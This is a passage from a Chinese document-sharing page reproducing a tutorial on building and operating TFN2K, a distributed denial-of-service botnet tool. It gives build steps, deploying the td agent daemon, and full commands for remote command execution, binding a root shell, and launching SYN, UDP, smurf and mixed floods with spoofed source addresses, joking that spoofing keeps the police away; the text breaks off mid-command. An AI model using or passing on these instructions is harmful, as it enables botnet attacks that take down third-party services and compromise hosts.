tfn2k安装与使用_第1页
tfn2k安装与使用_第2页
tfn2k安装与使用_第3页
tfn2k安装与使用_第4页
tfn2k安装与使用_第5页
已阅读5页,还剩2页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

tfn2k安装与使用作者:totoro_lee目录一什么是TFN2K?1二.tfn2k攻击原理11.tfn2k的攻击体系。12.tfn2k特性。2三tfn2k安装过程2四攻击测试4一什么是TFN2K?TFN2K 的作者是著名的德国黑客mixter.http:/mixter.void.ru/papers.htmlTFN2K通过主控端利用大量代理端主机的资源进行对一个或多个目标进行协同攻击。当前互联网中的UNIX、Solaris和Windows NT等平台的主机能被用于此类攻击,而且这个工具非常容易被移植到其它系统平台上。二.tfn2k攻击原理1.tfn2k的攻击体系。主控端-运行tfn客户端,来遥控并指定攻击目标,更改攻击方法.代理端-被植入并运行td进程的牺牲品,接受tfn的指挥,攻击的实施者.需要注意的是,一个攻击者,往往控制多台代理来完成攻击,而且其系统多为unix,linux等.2.tfn2k特性。 主控端通过TCP、UDP、ICMP或随机性使用其中之一(默认.随机)的数据包向代理端主机发送命令,攻击方法包括TCP/SYN、UDP、ICMP/PING、混合攻击、TARGA3等。主控端与代理端的通讯采取单向,即主控端只向代理端发送命令,并且会采取随机的头信息,甚至虚拟的源地址信息,代理端不会逆向向主控端发送任何信息.所有命令经过CAST-256算法加命,其关键字即编译程序时的输入的口令.并且这个口令做为唯一认证凭证.利用td进程,主控端可以远程执行shell命令.td进程的名称可以在编译时更改,更便于隐藏.tfn可以编译运行于win32及linux系统的.三tfn2k安装过程1.下载tfn2k.tar/detail/dandelionlife/45523092.解压ftn2k.tarrootlocalhost # cd /lzjrootlocalhost lzj# lstfn2k.tarrootlocalhost lzj# tar zxf tfn2k.tar /#解压tfn2k.tarrootlocalhost lzj# lstfn2k tfn2k.tarrootlocalhost lzj# cd tfn2krootlocalhost tfn2k# lsMakefile README src3.修改文件主要是修改Makefile,config.h,ip.h这三个文件,可以用vi打开修改A. src/Makefile 如果你的系统是linux系统,不需要做任何修就可以,如果是win32系统,请将 # Linux / *BSD* / Others CC = gcc CFLAGS = -Wall -O3 CLIBS = 这几行注释掉,并将 # Win32 (cygwin) #CC = gcc #CFLAGS = -Wall -DWINDOZE -O2 #CLIBS =这几行的注释去掉.因为我的测试系统为redhat linux 9.0所以并未做任何修改.B. src/config.h ,默认的就可以用,如果感兴趣,可以照其注释信息进行调整。 C. src/ip.h 这里要做一些修改,否则编译会有错误,发生重复定义。 /*struct in_addr unsigned long int s_addr; ;*/*/ 里的内容就是注释掉的内容。4.编译rootlocalhost tfn2k# cd srcrootlocalhost src# make(部分省略)Do you agree to this disclaimer y/n? ygcc -Wall -O3 mkpass.c -o mkpass./mkpassserver key 8 - 32 chars: /# 最少8位,这个必须记住是调用代理端上td进程的唯一认证。compiling server with 8 byte password.(部分省略)strip tfn 编译完成编译通过后,会产生td及tfn,这就是大名鼎鼎的tfn2k啦,td是守护进程,用来安装在代理端的,而tfn就是控制端.5.安装td可以把td文件上传到代理主机上,因为我只是测试,就让自己的自己又当控制端,又当代理端就可以了。rootlocalhost src# rootlocalhost src# ./td 运行td ,这样你就拥有一个代理了。如果不能运行可能是权限的问题,修改td文件的权限就可以。四攻击测试1.在控制端上:先新建一个代理主机的文件。格式就是 ip ip Ip这里面的ip就是运行了td进程的主机iprootlocalhost src# touch ip.txt /#新建一个文件rootlocalhost src# rootlocalhost src# echo ip.txt /#把代理主机的ip写进去,这里用的是本机做代理,就写本地地址。rootlocalhost src# rootlocalhost src# cat ip.txt /#查看一下写入成功rootlocalhost src#2.简单的测试一下rootlocalhost src# ./tfn -f ip.txt -c 10 -i mkdir /tmp/test Protocol : random Source IP : random Client input : list Command : execute remote commandPassword verification: /#输入之前设置的密码Sending out packets: .rootlocalhost src# rootlocalhost src# cd /tmp/rootlocalhost tmp# lsgcc-4.1.0 gmp-4.1.4 test tfn2k.rar trinoo.rargcc-4.1.0.tar.bz2 gmp-4.1.4.tar.bz2 tfn2k tfn.tgzrootlocalhost tmp#已经创建成功 test文件夹开始一个简单的攻击。Syn 泛洪攻击rootlocalhost src# rootlocalhost src# ./tfn -f ip.txt -c 5 -i 7 -p 8080 Protocol : random Source IP : random Client input : list TCP port : 8080 Target(s) : 7 Command : commence syn flood, port: 8080Password verification:Sending out packets: .rootlocalhost src#去被攻击主机抓包看看:每秒2w多个包,3.关闭攻击rootlocalhost src# ./tfn -f ip.txt -c 0 Protocol : random Source IP : random Client input : list Command : stop floodingPassword verification:Sending out packets: .rootlocalhost src# rootlocalhost src# rootlocalhost src#当然还有别的攻击方法,你只要用-c X就可以更改攻击方法./tfn直接回车大家可以看到一些参数,英文好的朋友估计不用我来多讲了格式./tfn 无用的参数我们不提,我们来说攻击用的-f 这个参数后面跟刚才所写的文本文件名,就是真正实现DDOS攻击,而不是DOS-h DOS攻击,也就是单机,一对一的攻击 后面跟一个主机或IP地址-p 后面指定一个端口,不用说了-c 最关键的参数,一共有11个选相0 - 停止攻击,发善心用的1 - 反欺骗等级设定 ,因为TFN这个工具在攻击的时候所发出的数据包是带有源地址的,但是源地址是随机的,也就是说地址不是你自给的,所以不用担心警察抓,哈哈2 - 改编数据包的包尺寸:缺省的ICMP/8,smurf,udp攻击缺省使用最小包。你可以通过改变每个包的有效载荷的字节增加它的大小。3 - 绑定root shell:启动一个会话服务,然后你连接一个指定端口就可以得到一个root shell。4 - UDP洪水攻击:这个攻击是利用这样一个事实:每个udp包被送往一个关闭的端口,这样就会有一个ICMP不可到达的信息返回,增加了攻击的能力。5 - SYN洪水攻击:这个攻击有规律的送虚假的连接请求。结果会是目标端口拒绝服务,添瞒TCP连接表,通过对不存在主机的TCP/RST响应增加攻击潜力,是标准的拒绝服务攻击.6 - ICMP响应(ping)攻击:这个攻击发送虚假地址的ping请求,目标主机会回送相同大小的响应包。7 - SMURF攻击:用目标主机的地址发送ping请求以广播扩大,这样目标主机将得到回复一个多倍的回复。8 - MIX攻击:按照1:1:1的关系交替的发送udp,syn,icmp包,这样就可以对付路由器,其它包转发设备,NIDS,sniffers等,轮番轰炸9 - TARGA3攻击10 - 远程命令执行,这个参数是TFN的附加功能,其实TFN的攻击不仅仅是DOS,还可以远程的进行明令控制,如:./tfn -f hostext -c 10 -i mkdir /root/edison 在所有的HOST上root家目录建立edison,-i后面跟命令参数基本说完,下面攻击./tfn -f hostext -c 4 -i X.X.X.X使用hostext文件中记录的主机对X.X.X.X服务器进行UDP攻击./tfn -f h

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论